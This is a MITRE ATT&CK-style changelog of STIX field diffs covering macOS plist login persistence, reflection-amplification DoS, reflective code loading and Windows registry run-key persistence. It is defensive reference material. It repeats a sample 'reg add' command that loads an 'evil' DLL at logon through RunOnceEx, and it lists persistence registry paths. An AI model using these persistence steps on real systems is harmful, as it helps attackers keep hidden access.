Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-01-24 19:51:37.795000+00:00 | 2022-04-19 23:46:56.443000+00:00 |
| description | Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist.
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence). |
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in. |
| external_references[1]['source_name'] | Methods of Mac Malware Persistence | Re-Open windows on Mac |
| external_references[1]['description'] | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. | Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017. |
| external_references[1]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://support.apple.com/en-us/HT204005 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Methods of Mac Malware Persistence', 'description': 'Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'} | |
| external_references | {'source_name': 'Wardle Persistence Chapter', 'description': 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.', 'url': 'https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf'} |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) | Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. 
This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:13:53.747000+00:00 | 2022-03-25 20:05:38.883000+00:00 |
| description | Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) | Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. 
This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-01 18:09:09.670000+00:00 | 2022-04-21 16:21:09.679000+00:00 |
| external_references[1]['source_name'] | Introducing Donut | 00sec Droppers |
| external_references[1]['description'] | The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021. | 0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021. |
| external_references[1]['url'] | https://thewover.github.io/Introducing-Donut/ | https://0x00sec.org/t/super-stealthy-droppers/3715 |
| external_references[3]['source_name'] | Stuart ELF Memory | Mandiant BYOL |
| external_references[3]['description'] | Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021. | Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021. |
| external_references[3]['url'] | https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html | https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique |
| external_references[4]['source_name'] | 00sec Droppers | S1 Old Rat New Tricks |
| external_references[4]['description'] | 0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021. | Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021. |
| external_references[4]['url'] | https://0x00sec.org/t/super-stealthy-droppers/3715 | https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/ |
| external_references[5]['source_name'] | Mandiant BYOL | MDSec Detecting DOTNET |
| external_references[5]['description'] | Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021. | MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021. |
| external_references[5]['url'] | https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique | https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/ |
| external_references[7]['source_name'] | S1 Old Rat New Tricks | Stuart ELF Memory |
| external_references[7]['description'] | Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021. | Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021. |
| external_references[7]['url'] | https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/ | https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html |
| external_references[8]['source_name'] | MDSec Detecting DOTNET | Introducing Donut |
| external_references[8]['description'] | MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021. | The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021. |
| external_references[8]['url'] | https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/ | https://thewover.github.io/Introducing-Donut/ |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Joas Antonio dos Santos, @C0d3Cr4zy |
| Old Description | New Description |
|---|---|
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020. | |
| external_references | CAPEC-270 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-270 | |
| external_references | Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-06 18:36:29.226000+00:00 | 2022-06-16 13:06:00.638000+00:00 |
| description | Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
| external_references[1]['source_name'] | capec | Malwarebytes Wow6432Node 2016 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/270.html | https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ |
| external_references[2]['source_name'] | Microsoft Run Key | Microsoft Wow6432Node 2018 |
| external_references[2]['description'] | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. | Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020. |
| external_references[2]['url'] | http://msdn.microsoft.com/en-us/library/aa376977 | https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry |
| external_references[3]['source_name'] | Microsoft Wow6432Node 2018 | Microsoft Run Key |
| external_references[3]['description'] | Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020. | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry | http://msdn.microsoft.com/en-us/library/aa376977 |
| external_references[4]['source_name'] | Malwarebytes Wow6432Node 2016 | Oddvar Moe RunOnceEx Mar 2018 |
| external_references[4]['description'] | Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020. | Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018. |
| external_references[4]['url'] | https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ | https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ |
| external_references[5]['source_name'] | Microsoft RunOnceEx APR 2018 | TechNet Autoruns |
| external_references[5]['description'] | Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[5]['url'] | https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
